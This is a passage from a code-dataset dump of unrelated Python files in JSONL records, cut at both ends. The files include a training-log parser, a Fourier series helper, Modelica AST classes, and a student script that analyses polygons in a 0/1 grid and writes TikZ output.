self.page.select().iterator():\n perc = self.fuzzy_percentage(p.name, name)\n if perc > maximum:\n maximum = perc\n res.insert(0, p)\n else:\n res.append(p)\n return res[:s.SUGGESTION_PG_LIMIT]","sub_path":"utils/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"144820333","text":"import json\n\n#this parses the huggingface training script output to list evaluation accuracy and loss evolution over epochs,\n#collecting the row with the highest accuracy\n\ntarget_epoch = 3.0\n\n#with 
open(\"huggingface-train-5-epochs.txt\", \"r\") as f:\nwith open(\"firefox-hf-8-iterations.txt\", \"r\") as f:\n#with open(\"huggingface-train-3-epochs-notriage.txt\", \"r\") as f:\n#with open(\"huggingface-train-1.txt\", \"r\") as f:\n log_text = f.read()\n\niterations = 0\nbest_loss = 100\nbest_epoch = 0\nbest_accuracy = 0\nfor line in log_text.splitlines():\n if line.startswith(\"{'eval_loss':\"):\n line = line.replace(\"'\", '\"')\n line_json = json.loads(line)\n #print(line_json[\"eval_loss\"])\n epoch = float(line_json[\"epoch\"])\n eval_loss = float(line_json[\"eval_loss\"])\n accuracy = float(line_json[\"eval_accuracy\"])\n if accuracy > best_accuracy:\n best_loss = eval_loss\n best_epoch = epoch\n best_accuracy = accuracy\n if epoch == target_epoch:\n iterations += 1\n print(f\"iteration {iterations}: best_loss={best_loss}, best_epoch={best_epoch}, best_accuracy={best_accuracy}\")\n best_loss = 100\n best_accuracy = 0\n best_epoch = 0\n","sub_path":"firefox-bug-predictor/huggingface_log_parser_acc.py","file_name":"huggingface_log_parser_acc.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631413984","text":"import numpy as np\n\n\ndef fourier_series_coefficients(f, T, N, return_complex=True, sample_rate=1000):\n r\"\"\"Calculates the first 2*N+1 Fourier series coefficients of a periodic function.\n\n Given a periodic, function f(t) with period T, this function returns the\n complex coefficients {c0,c1,c2,...}\n such that:\n\n .. math:: f(t) ~= \\sum_{k=-N}^N c_k \\cdot e^{i2 \\pi kt/T}\n\n where we define :math: `c_{-n}=\\overline{c_n}`\n\n Refer to `wikipedia `_ for the relation between the real-valued and\n complex valued coeffs.\n\n Notes\n -----\n This function was copied from\n `stackoverflow `_.\n\n Parameters\n ----------\n f : callable\n the periodic function, a callable like f(t)\n T : float\n the period of the function f, so that f(0)==f(T)\n N : int\n the function will return the first N+1 Fourier coeff.\n return_complex : bool, optional\n defaults to True\n sample_rate : int, optional\n used to tune fast Fourier transform (FFT) algorithm accuracy\n\n Returns\n -------\n ndarray\n numpy 1-dimensional complex-valued array of size N+1\n\n \"\"\"\n # From Shanon theorem we must use a sampling freq. larger than the maximum\n # frequency you want to catch in the signal. 
(Minimum 1000*N required for sufficient accuracy.)\n f_sample = sample_rate * N\n\n t = np.linspace(-T/2, T/2, f_sample, endpoint=False)\n\n y = np.fft.rfft(f(t)) / t.size\n\n # multiply odd terms by -1 to match SageMath\n y[1::2] *= -1\n\n # only take the number of coefficients requested\n y = y[:N + 1]\n\n if return_complex:\n return y\n else:\n y *= 2\n return y[0].real, y[1:].real, -y[1:].imag\n\n\n\n\n","sub_path":"bjsfm/fourier_series.py","file_name":"fourier_series.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"49653676","text":"#!/usr/bin/env python\n\"\"\"\nModelica AST definitions\n\"\"\"\nfrom __future__ import print_function, absolute_import, division, print_function, unicode_literals\n\nimport copy\nimport json\nfrom enum import Enum\nfrom typing import List, Union, Dict\nfrom collections import OrderedDict\n\n\nclass ClassNotFoundError(Exception):\n pass\n\n\nclass Visibility(Enum):\n PRIVATE = 0, 'private'\n PROTECTED = 1, 'protected'\n PUBLIC = 2, 'public'\n\n def __new__(cls, value, name):\n member = object.__new__(cls)\n member._value_ = value\n member.fullname = name\n return member\n\n def __int__(self):\n return self.value\n\n def __str__(self):\n return self.fullname\n\n def __lt__(self, other):\n return self.value < other.value\n\n\nnan = float('nan')\n\n\"\"\"\nAST Node Type Hierarchy\n\nRoot Class\n Class\n Equation\n ComponentRef\n Expression\n Primary\n IfEquation\n Expression\n Equation\n ForEquation\n Expression\n Equation\n ConnectClause\n ComponentRef\n Symbol\n\"\"\"\n\n\nclass Node(object):\n def __init__(self, **kwargs):\n self.set_args(**kwargs)\n\n def set_args(self, **kwargs):\n for key in kwargs.keys():\n if key not in self.__dict__.keys():\n raise KeyError('{:s} not valid arg'.format(key))\n self.__dict__[key] = kwargs[key]\n\n def __repr__(self):\n return json.dumps(self.to_json(self), indent=2, sort_keys=True)\n\n @classmethod\n def to_json(cls, var):\n if isinstance(var, list):\n res = [cls.to_json(item) for item in var]\n elif isinstance(var, dict):\n res = {key: cls.to_json(var[key]) for key in var.keys()}\n elif isinstance(var, Node):\n res = {key: cls.to_json(var.__dict__[key]) for key in var.__dict__.keys()}\n elif isinstance(var, Visibility):\n res = str(var)\n else:\n res = var\n return res\n\n __str__ = __repr__\n\n\nclass Primary(Node):\n def __init__(self, **kwargs):\n self.value = None # type: Union[bool, float, int, str, type(None)]\n super().__init__(**kwargs)\n\n\nclass Array(Node):\n def __init__(self, **kwargs):\n self.values = [] # type: List[Union[Expression, Primary, ComponentRef, Array]]\n super().__init__(**kwargs)\n\n\nclass Slice(Node):\n def __init__(self, **kwargs):\n self.start = Primary(value=0) # type: Union[Expression, Primary, ComponentRef]\n self.stop = Primary(value=-1) # type: Union[Expression, Primary, ComponentRef]\n self.step = Primary(value=1) # type: Union[Expression, Primary, ComponentRef]\n super().__init__(**kwargs)\n\n\nclass ComponentRef(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.indices = [] # type: List[Union[Expression, Slice, Primary, ComponentRef]]\n self.child = [] # type: List[ComponentRef]\n super().__init__(**kwargs)\n\n def __str__(self) -> str:\n return \".\".join(self.to_tuple())\n\n def to_tuple(self) -> tuple:\n \"\"\"\n Convert the nested component reference to flat tuple of names, which is\n hashable and can therefore be used as dictionary key. 
Note that this\n function ignores any array indices in the component reference.\n :return: flattened tuple of c's names\n \"\"\"\n\n if self.child:\n return (self.name, ) + self.child[0].to_tuple()\n else:\n return (self.name, )\n\n @classmethod\n def from_tuple(cls, components: tuple) -> 'ComponentRef':\n \"\"\"\n Convert the tuple pointing to a component to\n a component reference.\n :param components: tuple of components name\n :return: ComponentRef\n \"\"\"\n\n component_ref = ComponentRef(name=components[0], child=[])\n c = component_ref\n for component in components[1:]:\n c.child.append(ComponentRef(name=component, child=[]))\n c = c.child[0]\n return component_ref\n\n @classmethod\n def from_string(cls, s: str) -> 'ComponentRef':\n \"\"\"\n Convert the string pointing to a component using dot notation to\n a component reference.\n :param s: string pointing to component using dot notation\n :return: ComponentRef\n \"\"\"\n\n components = s.split('.')\n return cls.from_tuple(components)\n\n @classmethod\n def concatenate(cls, *args: List['ComponentRef']) -> 'ComponentRef':\n \"\"\"\n Helper function to append two component references to eachother, e.g.\n a \"within\" component ref and an \"object type\" component ref.\n :param a:\n :param b:\n :return: New component reference, with other appended to self.\n \"\"\"\n\n a = copy.deepcopy(args[0])\n n = a\n for b in args[1:]:\n while n.child:\n n = n.child[0]\n b = copy.deepcopy(b) # Not strictly necessary\n n.child = [b]\n return a\n\n\nclass Expression(Node):\n def __init__(self, **kwargs):\n self.operator = None # type: Union[str, ComponentRef]\n self.operands = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n super().__init__(**kwargs)\n\n\nclass IfExpression(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n self.expressions = [] # type: List[Union[Expression, Primary, ComponentRef, Array, IfExpression]]\n super().__init__(**kwargs)\n\n\nclass Equation(Node):\n def __init__(self, **kwargs):\n self.left = None # type: Union[Expression, Primary, ComponentRef, List[Union[Expression, Primary, ComponentRef]]]\n self.right = None # type: Union[Expression, Primary, ComponentRef, List[Union[Expression, Primary, ComponentRef]]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass IfEquation(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef]]\n self.equations = [] # type: List[Union[Expression, ForEquation, ConnectClause, IfEquation]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ForIndex(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.expression = None # type: Union[Expression, Primary, Slice]\n super().__init__(**kwargs)\n\n\nclass ForEquation(Node):\n def __init__(self, **kwargs):\n self.indices = [] # type: List[ForIndex]\n self.equations = [] # type: List[Union[Equation, ForEquation, ConnectClause]]\n self.comment = None # type: str\n super().__init__(**kwargs)\n\n\nclass ConnectClause(Node):\n def __init__(self, **kwargs):\n self.left = ComponentRef() # type: ComponentRef\n self.right = ComponentRef() # type: ComponentRef\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass AssignmentStatement(Node):\n def __init__(self, **kwargs):\n self.left = [] # type: List[ComponentRef]\n self.right = None # type: Union[Expression, IfExpression, Primary, ComponentRef]\n 
self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass IfStatement(Node):\n def __init__(self, **kwargs):\n self.conditions = [] # type: List[Union[Expression, Primary, ComponentRef]]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ForStatement(Node):\n def __init__(self, **kwargs):\n self.indices = [] # type: List[ForIndex]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.comment = '' # type: str\n super().__init__(**kwargs)\n\n\nclass Symbol(Node):\n \"\"\"\n A mathematical variable or state of the model\n \"\"\"\n ATTRIBUTES = ['value', 'min', 'max', 'start', 'fixed', 'nominal']\n\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.type = ComponentRef() # type: ComponentRef\n self.prefixes = [] # type: List[str]\n self.redeclare = False # type: bool\n self.final = False # type: bool\n self.inner = False # type: bool\n self.outer = False # type: bool\n self.dimensions = [Primary(value=1)] # type: List[Union[Expression, Primary, ComponentRef]]\n self.comment = '' # type: str\n # params start value is 0 by default from Modelica spec\n self.start = Primary(value=0) # type: Union[Expression, Primary, ComponentRef, Array]\n self.min = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.max = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.nominal = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.value = Primary(value=None) # type: Union[Expression, Primary, ComponentRef, Array]\n self.fixed = Primary(value=False) # type: Primary\n self.id = 0 # type: int\n self.order = 0 # type: int\n self.visibility = Visibility.PRIVATE # type: Visibility\n self.class_modification = None # type: ClassModification\n super().__init__(**kwargs)\n\n\nclass ComponentClause(Node):\n def __init__(self, **kwargs):\n self.prefixes = [] # type: List[str]\n self.type = ComponentRef() # type: ComponentRef\n self.dimensions = [Primary(value=1)] # type: List[Union[Expression, Primary, ComponentRef]]\n self.comment = [] # type: List[str]\n self.symbol_list = [] # type: List[Symbol]\n super().__init__(**kwargs)\n\n\nclass EquationSection(Node):\n def __init__(self, **kwargs):\n self.initial = False # type: bool\n self.equations = [] # type: List[Union[Equation, IfEquation, ForEquation, ConnectClause]]\n super().__init__(**kwargs)\n\n\nclass AlgorithmSection(Node):\n def __init__(self, **kwargs):\n self.initial = False # type: bool\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n super().__init__(**kwargs)\n\n\nclass ImportAsClause(Node):\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: ComponentRef\n self.name = '' # type: str\n super().__init__(**kwargs)\n\n\nclass ImportFromClause(Node):\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: ComponentRef\n self.symbols = [] # type: List[str]\n super().__init__(**kwargs)\n\n\nclass ElementModification(Node):\n # TODO: Check if ComponentRef modifiers are handled correctly. 
For example,\n # check HomotopicLinear which extends PartialHomotopic with the modifier\n # \"H(min = H_b)\".\n def __init__(self, **kwargs):\n self.component = ComponentRef() # type: Union[ComponentRef]\n self.modifications = [] # type: List[Union[Primary, Expression, ClassModification, Array, ComponentRef]]\n super().__init__(**kwargs)\n\n\nclass ShortClassDefinition(Node):\n def __init__(self, **kwargs):\n self.name = '' # type: str\n self.type = '' # type: str\n self.component = ComponentRef() # type: ComponentRef\n self.class_modification = ClassModification() # type: ClassModification\n super().__init__(**kwargs)\n\n\nclass ElementReplaceable(Node):\n def __init__(self, **kwargs):\n # TODO, add fields ?\n super().__init__(**kwargs)\n\n\nclass ClassModification(Node):\n def __init__(self, **kwargs):\n self.arguments = [] # type: List[Union[ElementModification, ComponentClause, ShortClassDefinition]]\n super().__init__(**kwargs)\n\n\nclass ExtendsClause(Node):\n def __init__(self, **kwargs):\n self.component = None # type: ComponentRef\n self.class_modification = None # type: ClassModification\n self.visibility = Visibility.PRIVATE # type: Visibility\n super().__init__(**kwargs)\n\n\nclass Class(Node):\n def __init__(self, **kwargs):\n self.name = None # type: str\n self.imports = [] # type: List[Union[ImportAsClause, ImportFromClause]]\n self.extends = [] # type: List[ExtendsClause]\n self.encapsulated = False # type: bool\n self.partial = False # type: bool\n self.final = False # type: bool\n self.type = '' # type: str\n self.comment = '' # type: str\n self.classes = OrderedDict() # type: OrderedDict[str, Class]\n self.symbols = OrderedDict() # type: OrderedDict[str, Symbol]\n self.functions = OrderedDict() # type: OrderedDict[str, Class]\n self.initial_equations = [] # type: List[Union[Equation, ForEquation]]\n self.equations = [] # type: List[Union[Equation, ForEquation, ConnectClause]]\n self.initial_statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.statements = [] # type: List[Union[AssignmentStatement, IfStatement, ForStatement]]\n self.within = [] # type: List[ComponentRef]\n super().__init__(**kwargs)\n\n\nclass File(Node):\n \"\"\"\n Represents a .mo file for use in pre-processing before flattening to a single class.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.within = [] # type: List[ComponentRef]\n self.classes = OrderedDict() # type: OrderedDict[str, Class]\n super().__init__(**kwargs)\n\n\nclass Collection(Node):\n \"\"\"\n A list of modelica files, used in pre-processing packages etc. 
before flattening\n to a single class.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.files = [] # type: List[File]\n super().__init__(**kwargs)\n\n # TODO: Should be directly build the class_lookup, or wait until the first call to find_class?\n self._class_lookup = None\n\n def _build_class_lookup_for_class(self, c, within):\n if within:\n full_name = ComponentRef.concatenate(within, ComponentRef(name=c.name))\n else:\n full_name = ComponentRef(name=c.name)\n\n # FIXME: Do we have to convert to string?\n self._class_lookup[full_name.to_tuple()] = c\n\n if within:\n within = ComponentRef.concatenate(within, ComponentRef(name=c.name))\n else:\n within = ComponentRef(name=c.name)\n for nested_c in c.classes.values():\n self._build_class_lookup_for_class(nested_c, within)\n\n def _build_class_lookup(self):\n self._class_lookup = {}\n\n for f in self.files:\n within = f.within[0] if f.within else None\n for c in f.classes.values():\n self._build_class_lookup_for_class(c, within)\n\n def extend(self, other):\n self.files.extend(other.files)\n\n def find_class(self, component_ref: ComponentRef, within: list = None, check_builtin_classes=False, return_ref=False):\n if check_builtin_classes:\n if component_ref.name in [\"Real\", \"Integer\", \"String\", \"Boolean\"]:\n c = Class(name=component_ref.name)\n c.type = \"__builtin\"\n\n cref = ComponentRef(name=component_ref.name)\n s = Symbol(name=\"__value\", type=cref)\n c.symbols[s.name] = s\n\n if return_ref:\n return c, cref\n else:\n return c\n\n if self._class_lookup is None:\n self._build_class_lookup()\n\n # TODO: Support lookups starting with a dot. These are lookups in the root node (i.e. within not used).\n # Odds are that these types of lookups are not parsed yet. We would expet an empty first name, with a non-empty child.\n\n # Lookup the referenced class, walking up the tree from the current\n # node until the root node.\n c = None\n\n if within:\n within_tuple = within[0].to_tuple()\n else:\n within_tuple = tuple()\n\n cref_tuple = component_ref.to_tuple()\n\n prev_tuple = None\n\n while c is None:\n c = self._class_lookup.get(within_tuple + cref_tuple, None)\n\n prev_tuple = within_tuple + cref_tuple\n\n if within_tuple:\n within_tuple = within_tuple[:-1]\n else:\n # Finished traversing up the tree all the way to the root. 
No\n # more lookups possible.\n break\n\n if c is None:\n # Class not found\n if component_ref.name in (\"Real\", \"Integer\", \"Boolean\", \"String\", \"Modelica\", \"SI\"):\n # FIXME: To support an \"ignore\" in the flattener, we raise a\n # KeyError for what are likely to be elementary types\n raise KeyError\n else:\n raise ClassNotFoundError(\"Could not find class {}\".format(component_ref))\n\n if return_ref:\n return c, ComponentRef.from_tuple(prev_tuple)\n else:\n return c\n\n def find_symbol(self, node, component_ref: ComponentRef) -> Symbol:\n sym = node.symbols[component_ref.name]\n if len(component_ref.child) > 0:\n node = self.find_class(sym.type)\n return self.find_symbol(node, component_ref.child[0])\n else:\n return sym\n","sub_path":"pymola/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":17353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518484378","text":"# Written by Peter Leonard for COMP9021 \n# Assignment 2 17s1\n\n# Input:\n# The input is expected to consist of ydim lines of xdim 0’s and 1’s,\n# where xdim and ydim are at least equal to 2 and at most equal to 50,\n# with possibly lines consisting of spaces only that will be ignored and with possibly spaces anywhere on the lines with digits.\n# If n is the xth digit of the yth line with digits, with 0 ≤ x < xdim and 0 ≤ y < ydim,\n# then n is to be associated with a point situated x×0.4 cm to the right and y×0.4 cm below an origin.\n\nfrom argparse import ArgumentParser\nfrom re import sub\nfrom statistics import mean\nfrom itertools import count\nfrom math import ceil\nimport os\nimport sys\n\nimport operator\n\n# length in cm\nlength = 0.4\n\n# display grid (for testing purpose)\ndef display_grid():\n for i in range(y_dim):\n print(' ', end = '')\n for j in range(x_dim):\n print(f' {grid[i][j]}', end = '') if grid[i][j] else print(' 0', end = '')\n print()\n print()\n\ndef display_dirgrid():\n for i in range(y_dim):\n print(' ', end = '')\n for j in range(x_dim):\n print(f' {dir_grid[i][j]}', end = '') if grid[i][j] else print(' 0', end = '')\n print()\n print()\n\n# direction list\ndir_list = ['N','NE','E','SE','S','SW','W','NW']\n\ndef get_nextDirection(current_direction):\n if current_direction == 'NW':\n next_direction = dir_list[0]\n else:\n next_direction = dir_list[dir_list.index(current_direction) + 1]\n\n return next_direction\n\ndef get_ij_from_direction(direction, i, j):\n if i and direction == 'N':\n i = i - 1\n j = j\n elif i and j < x_dim - 1 and direction == 'NE':\n i = i - 1\n j = j + 1\n elif j < x_dim - 1 and direction == 'E':\n i = i\n j = j + 1\n elif i < y_dim - 1 and j < x_dim - 1 and direction == 'SE':\n i = i + 1\n j = j + 1\n elif i < y_dim - 1 and direction == 'S':\n i = i + 1\n j = j\n elif i < y_dim - 1 and j and direction == 'SW':\n i = i + 1\n j = j - 1\n elif j and direction == 'W':\n i = i\n j = j - 1\n elif i and j and direction == 'NW':\n i = i - 1\n j = j - 1\n else:\n return -1, -1\n\n return i, j\n\ndef get_direction(direction):\n original_direction = get_nextDirection(direction)\n original_direction = get_nextDirection(original_direction)\n original_direction = get_nextDirection(original_direction)\n original_direction = get_nextDirection(original_direction)\n \n next_direction = get_nextDirection(direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = get_nextDirection(next_direction)\n next_direction = 
get_nextDirection(next_direction)\n\n return original_direction, next_direction\n \ndef clear_visited_grid():\n for i in range(y_dim):\n for j in range(x_dim):\n visited[i][j] = False\n\ndef colour_polygons():\n colour = 2\n for i in range(y_dim):\n for j in range(x_dim):\n if grid[i][j] == 1:\n # initiate variable\n start_i = i\n start_j = j\n direction = 'SE'\n axis = 0\n perimeter_axis[colour] = 0\n perimeter_diagonal[colour] = 0\n area[colour] = 0\n convex[colour] = True\n\n clear_visited_grid()\n colour_ij(start_i, start_j, i, j, direction, colour)\n perimeter_axis[colour] *= length\n area[colour] = abs(area[colour]) * (length**2) / 2\n colour += 1\n return colour\n\ndef get_perimeter(next_direction, colour):\n if next_direction == 'N' or next_direction == 'E' or next_direction == 'S' or next_direction == 'W':\n perimeter_axis[colour] += 1\n else:\n perimeter_diagonal[colour] += 1\n\ndef get_area(i, j, next_i, next_j, colour):\n area[colour] += (i * next_j) - (j * next_i)\n\ndef is_convex(original_direction, next_direction, colour):\n if next_direction == (get_nextDirection(original_direction)) or next_direction == (get_nextDirection(get_nextDirection(original_direction))) or next_direction == get_nextDirection(get_nextDirection(get_nextDirection(original_direction))):\n convex[colour] = False\n \ndef colour_ij(start_i, start_j, i, j, direction, colour):\n grid[i][j] = colour\n visited[i][j] = True\n \n original_direction, next_direction = get_direction(direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n\n for _ in range(7):\n # base case\n if start_i == next_i and start_j == next_j:\n dir_grid[i][j] = next_direction\n get_perimeter(next_direction, colour)\n get_area(i, j, next_i, next_j, colour)\n is_convex(original_direction, next_direction, colour)\n return True\n\n # if not valid get next direction\n if (next_i == -1 and next_j == -1) or (grid[next_i][next_j] != 1) or (visited[next_i][next_j]):\n next_direction = get_nextDirection(next_direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n continue\n \n if colour_ij(start_i, start_j, next_i, next_j, next_direction, colour):\n dir_grid[i][j] = next_direction\n get_perimeter(next_direction, colour)\n get_area(i, j, next_i, next_j, colour)\n if not (start_i == i and start_j == j):\n is_convex(original_direction, next_direction, colour)\n return True\n\n # if colour_ij false, get next direction\n next_direction = get_nextDirection(next_direction)\n next_i, next_j = get_ij_from_direction(next_direction, i, j)\n\n # backtracking\n grid[i][j] = 1\n return False\n\n# check for validity (non 1's after colouring)\ndef check_validity():\n for i in range(y_dim):\n for j in range(x_dim):\n if grid[i][j] == 1:\n print('Incorrect input.')\n sys.exit()\n\n# print result function\ndef print_result():\n for i in range(2,nb_of_polygons):\n print(f'Polygon {i-1}:')\n if perimeter_diagonal[i] == 0:\n print(f' Perimeter: {perimeter_axis[i]:.1f}')\n else:\n print(f' Perimeter: {perimeter_axis[i]:.1f} + {perimeter_diagonal[i]}*sqrt(.32)')\n print(f' Area: {area[i]:.2f}')\n if convex[i]:\n print(f' Convex: yes')\n else:\n print(f' Convex: no')\n print(f' Nb of invariant rotations: {rotations[i]}')\n print(f' Depth: {depth[i]}')\n\ndef get_rotations():\n for colour in range(2, nb_of_polygons):\n # by default 1 rotation exists\n rotations[colour] = 1\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n start_i = i\n start_j = j\n 
direction = dir_grid[start_i][start_j]\n next_i, next_j = get_ij_from_direction(direction, start_i, start_j)\n while True:\n if next_i == i and next_j == j:\n break\n complete = True\n if dir_grid[start_i][start_j] != dir_grid[next_i][next_j]:\n if len(dir_grid[start_i][start_j]) == len(dir_grid[next_i][next_j]):\n # start looping to check\n temp_dir = dir_grid[start_i][start_j]\n current_i, current_j = get_ij_from_direction(temp_dir, start_i, start_j)\n next_temp_dir = dir_grid[next_i][next_j]\n next_next_i, next_next_j = get_ij_from_direction(next_temp_dir,next_i, next_j)\n while True:\n if current_i == start_i and current_j == start_j:\n break\n if len(dir_grid[current_i][current_j]) != len(dir_grid[next_next_i][next_next_j]):\n complete = False\n break\n temp_dir = dir_grid[current_i][current_j]\n next_temp_dir = dir_grid[next_next_i][next_next_j]\n current_i, current_j = get_ij_from_direction(temp_dir, current_i, current_j)\n next_next_i, next_next_j = get_ij_from_direction(next_temp_dir, next_next_i, next_next_j)\n if complete:\n start_i = next_i\n start_j = next_j\n rotations[colour] += 1\n direction = dir_grid[next_i][next_j]\n next_i, next_j = get_ij_from_direction(direction, next_i, next_j)\n stop = True\ndef check_top(i, j, in_top, colour):\n if j:\n if dir_grid[i-1][j-1] == 'SE' and grid[i-1][j-1] == colour:\n in_top = 1\n if dir_grid[i-1][j] == 'S' and grid[i-1][j] == colour:\n in_top = 1\n if dir_grid[i-1][j+1] == 'SW' and grid[i-1][j+1] == colour:\n in_top = 1\n return in_top\n\ndef check_bottom(i, j, in_bottom, colour):\n if j:\n if dir_grid[i+1][j-1] == 'NE' and grid[i+1][j-1] == colour:\n in_bottom = 1\n if dir_grid[i+1][j] == 'N' and grid[i+1][j] == colour:\n in_bottom = 1\n if dir_grid[i+1][j+1] == 'NW' and grid[i+1][j+1] == colour:\n in_bottom = 1\n return in_bottom\n\ndef check_mid(i, j, in_top, in_bottom, cross):\n if in_top:\n if 'S' in dir_grid[i][j]:\n cross += 1\n in_top = 0\n else:\n in_top = 0\n if in_bottom:\n if 'N' in dir_grid[i][j]:\n cross += 1\n in_bottom = 0\n else:\n in_bottom = 0\n return cross, in_top, in_bottom\n\ndef get_depth():\n # first polygon always have 0 depth (outermost so to say)\n depth[2] = 0\n for colour in range(3, nb_of_polygons):\n # initiate depth for colour\n depth[colour] = 0\n in_top = 0\n in_bottom = 0\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n for outer_layer in range(2, colour):\n start_i = i\n start_j = j\n cross = 0\n while (start_j):\n start_j -= 1\n if grid[start_i][start_j] == outer_layer:\n if start_i:\n in_top = check_top(start_i, start_j, in_top, outer_layer)\n if start_i < y_dim - 1:\n in_bottom = check_bottom(start_i, start_j, in_bottom, outer_layer)\n cross, in_top, in_bottom = check_mid(start_i, start_j, in_top, in_bottom, cross)\n if cross % 2 == 1:\n depth[colour] += 1\n stop = True\n\ndef get_coordinate():\n for colour in range(2, nb_of_polygons):\n coordinates[colour] = []\n stop = False\n for i in range(y_dim):\n if stop:\n break\n for j in range(x_dim):\n if stop:\n break\n if grid[i][j] == colour:\n coordinates[colour] = [(j, i)]\n start_i = i\n start_j = j\n direction = dir_grid[start_i][start_j]\n next_i, next_j = get_ij_from_direction(direction, start_i, start_j)\n while True:\n if next_i == i and next_j == j:\n break\n if dir_grid[start_i][start_j] != dir_grid[next_i][next_j]:\n coordinates[colour] += [(next_j, next_i)]\n start_i = next_i\n start_j = next_j\n direction = dir_grid[next_i][next_j]\n next_i, next_j = 
get_ij_from_direction(direction, next_i, next_j)\n stop = True\n\n \ndef output_tex():\n tex_filename = sub('\\..*$', '', filename) + '_output.tex'\n max_area = max(area.values())\n min_area = min(area.values())\n max_depth = max(depth.values())\n with open(tex_filename, 'w') as tex_file:\n print('\\\\documentclass[10pt]{article}\\n'\n '\\\\usepackage{tikz}\\n'\n '\\\\usepackage[margin=0cm]{geometry}\\n'\n '\\\\pagestyle{empty}\\n'\n '\\n'\n '\\\\begin{document}\\n'\n '\\n'\n '\\\\vspace*{\\\\fill}\\n'\n '\\\\begin{center}\\n'\n '\\\\begin{tikzpicture}[x=0.4cm, y=-0.4cm, thick, brown]', file = tex_file)\n print(f'\\\\draw[ultra thick] (0, 0) -- ({x_dim - 1}, 0) -- ({x_dim - 1}, {y_dim - 1}) -- (0, {y_dim - 1}) -- cycle;', file = tex_file)\n for i in range(max_depth + 1):\n print(f'%Depth {i}', file = tex_file)\n for x in range(2, nb_of_polygons):\n if depth[x] == i:\n colour = round((max_area - area[x]) / (max_area - min_area) * 100)\n print(f'\\\\filldraw[fill=orange!{colour}!yellow]', end = ' ', file = tex_file)\n for y in coordinates[x]:\n print(f'{y} --', end = ' ', file = tex_file)\n print('cycle;', file = tex_file)\n print('\\\\end{tikzpicture}\\n'\n '\\\\end{center}\\n'\n '\\\\vspace*{\\\\fill}\\n'\n '\\n'\n '\\\\end{document}', file = tex_file)\n\n return tex_filename\n\nparser = ArgumentParser()\nparser.add_argument('-print', dest = 'print_tex', action= 'store_true')\nparser.add_argument('--file', dest = 'filename', required = True)\nargs = parser.parse_args()\n\nfilename = args.filename\nprint_tex = args.print_tex\ntry:\n read_list = []\n with open(filename) as file:\n for line_no,line in enumerate(file):\n line = line.strip('\\n')\n line = line.replace(\" \", \"\")\n if line != '':\n read_list += [line]\n\n # getting x dim and y dim\n x_dim = len(read_list[0])\n y_dim = len(read_list)\n\n # check for incorrect input\n incorrect_input = False\n if x_dim > 50 or y_dim > 50 or x_dim < 2 or y_dim < 2:\n incorrect_input = True\n\n for i in range(0, len(read_list)):\n for x in range(0, len(read_list[i])):\n if int(read_list[i][x]) < 0 or int(read_list[i][x]) > 1:\n incorrect_input = True\n break\n\n if incorrect_input:\n print('Incorrect input.')\n sys.exit()\n\nexcept FileNotFoundError:\n print(f'File {filename} could not be found.')\n\n\n# creating grid\ngrid = [[0 for _ in range(x_dim)] for _ in range(y_dim)]\nvisited = [[None for _ in range(x_dim)] for _ in range(y_dim)]\ndir_grid = [[None for _ in range(x_dim)] for _ in range(y_dim)]\n\nfor i in range(y_dim):\n for j in range(x_dim):\n grid[i][j] = int(read_list[i][j])\n\n# initiate dictionary for each answer\nperimeter_axis = {}\nperimeter_diagonal = {}\narea = {}\nconvex = {}\nrotations = {}\ndepth = {}\ncoordinates = {}\n\n# colour polygons\nnb_of_polygons = colour_polygons()\n# check validity\ncheck_validity()\n\n# get invariant rotations and depth\nget_rotations()\nget_depth()\nget_coordinate()\n\ndisplay_grid()\ndisplay_dirgrid()\n# print the calculation\nprint_result()\n\n# output -print\nif print_tex:\n tex_filename = output_tex()\n os.system('pdflatex ' + tex_filename)\n\n\n","sub_path":"Data/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":16052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406924194","text":"# -*- coding: utf-8 -*\n\n# -------------------------------------------------------------------------------\n# Author: LiuNing\n# Contact: 